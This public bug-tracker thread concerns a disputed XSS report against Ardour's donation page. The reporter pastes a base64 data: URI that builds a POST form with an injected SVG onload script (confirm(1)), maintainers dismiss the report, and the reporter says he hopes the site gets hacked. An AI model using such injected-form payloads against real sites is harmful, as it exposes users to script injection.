View Issue Details

ID: 0007660
Project: ardour
Category: bugs
View Status: public
Last Update: 2021-05-28 18:31
Reporter: naveed78945124
Assigned To: paul
Priority: high
Severity: major
Reproducibility: always
Status: closed
Resolution: reopened
Platform: kali
OS: kali linux
OS Version: kali 2.0
Product Version: 5.12
Summary: 0007660: xss vulnerability
Description: I have found an XSS vulnerability on your site.
I have pasted a URL to reproduce.
Paste the link into a web browser.
Click the XSS.
Steps To Reproduce: data:Text/Html;Base64,PGZvcm0gYWN0aW9uPWh0dHA6Ly9jb21tdW5pdHkuYXJkb3VyLm9yZy9kb25hdGUyIG1ldGhvZD0iUE9TVCI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImN1cnJlbmN5IiB2YWx1ZT0iVVNEIj48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iY3VycmVuY3kiIHZhbHVlPSImcXVvdDstLSEmZ3Q7Jmx0O1N2Zy9PbkxvYWQ9KGNvbmZpcm0pKDEpJmd0OyZxdW90OyI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImFtb3VudCIgdmFsdWU9IjI1Ij48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0ic3VibWl0IiB2YWx1ZT0iIj48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iIiB2YWx1ZT0iIj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9WFNTPjwvZm9ybT4=
Additional Information: https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Tags: No tags attached.

  Users sponsoring this issue
Sponsors List Total Sponsorship = US$ 250

2018-09-05 21:21: naveed78945124 (US$ 250)

Activities

naveed78945124

2018-09-05 21:12

reporter  

Capture2.PNG (88,813 bytes)   

naveed78945124

2018-09-05 21:24

reporter   ~0020378

I don't know what is the meaning of "Users sponsoring this issue"?

timbyr

2018-09-08 01:32

developer   ~0020380

Sponsoring an issue is an indication of how much someone is willing to pay to see an issue fixed or functionality completed. It is an honesty system and is non-binding.

naveed78945124

2018-09-13 15:15

reporter   ~0020384

When do I get the sponsoring money?

Headwar

2018-09-21 09:30

reporter   ~0020391

Sponsoring is how much you are willing to pay for the issue to be fixed, not how much you will earn from reporting it.

x42

2018-10-25 18:56

administrator   ~0020418

What is the actual issue here?

Craft a dedicated link that makes a user believe he's going to donate to ardour.org. Make a user click on that link somehow, then gain access to the user's account at ardour.org or some other browser-tab information?

paul

2021-05-26 19:07

administrator   ~0025894

We don't fix XSS "bugs".

anonymous

2021-05-26 19:08

viewer   ~0025895

Issue has been closed automatically, by Trigger Close Plugin.
Feel free to re-open with additional information if you think the issue is not resolved.

naveed78945124

2021-05-27 17:14

reporter   ~0025901

Can I get any bug bounty?

paul

2021-05-28 15:49

administrator   ~0025905

You have failed to understand what was told to you above.

We do not offer bug bounties. Not for anything at all, and absolutely not for bogus "XSS vulnerability" reports. Please do not contact us again about this matter.

naveed78945124

2021-05-28 18:06

reporter   ~0025906

What a shame.
I helped you with the world's 3rd-ranked vulnerability.
I pray your website will be hacked as soon as possible.
Shame on you, Paul.

naveed78945124

2021-05-28 18:07

reporter   ~0025907

Please don't contact me again or email me.

Issue History

Date Modified Username Field Change
2018-09-05 21:12 naveed78945124 New Issue
2018-09-05 21:12 naveed78945124 File Added: Capture2.PNG
2018-09-05 21:21 naveed78945124 Sponsorship Added naveed78945124: US$ 10000
2018-09-05 21:21 naveed78945124 Sponsorship Total 0 => 10000
2018-09-05 21:24 naveed78945124 Note Added: 0020378
2018-09-08 01:32 timbyr Note Added: 0020380
2018-09-11 11:15 naveed78945124 Sponsorship Updated naveed78945124: US$ 250
2018-09-11 11:15 naveed78945124 Sponsorship Total 10000 => 250
2018-09-13 15:15 naveed78945124 Note Added: 0020384
2018-09-21 09:30 Headwar Note Added: 0020391
2018-10-25 18:56 x42 Note Added: 0020418
2021-05-26 19:07 paul Assigned To => paul
2021-05-26 19:07 paul Status new => resolved
2021-05-26 19:07 paul Resolution open => no change required
2021-05-26 19:07 paul Note Added: 0025894
2021-05-26 19:08 anonymous Note Added: 0025895
2021-05-26 19:08 anonymous Status resolved => closed
2021-05-27 17:14 naveed78945124 Status closed => feedback
2021-05-27 17:14 naveed78945124 Resolution no change required => reopened
2021-05-27 17:14 naveed78945124 Note Added: 0025901
2021-05-28 15:49 paul Note Added: 0025905
2021-05-28 15:49 paul Status feedback => closed
2021-05-28 18:06 naveed78945124 Status closed => feedback
2021-05-28 18:06 naveed78945124 Note Added: 0025906
2021-05-28 18:07 naveed78945124 Note Added: 0025907
2021-05-28 18:07 naveed78945124 Status feedback => assigned
2021-05-28 18:31 paul Status assigned => closed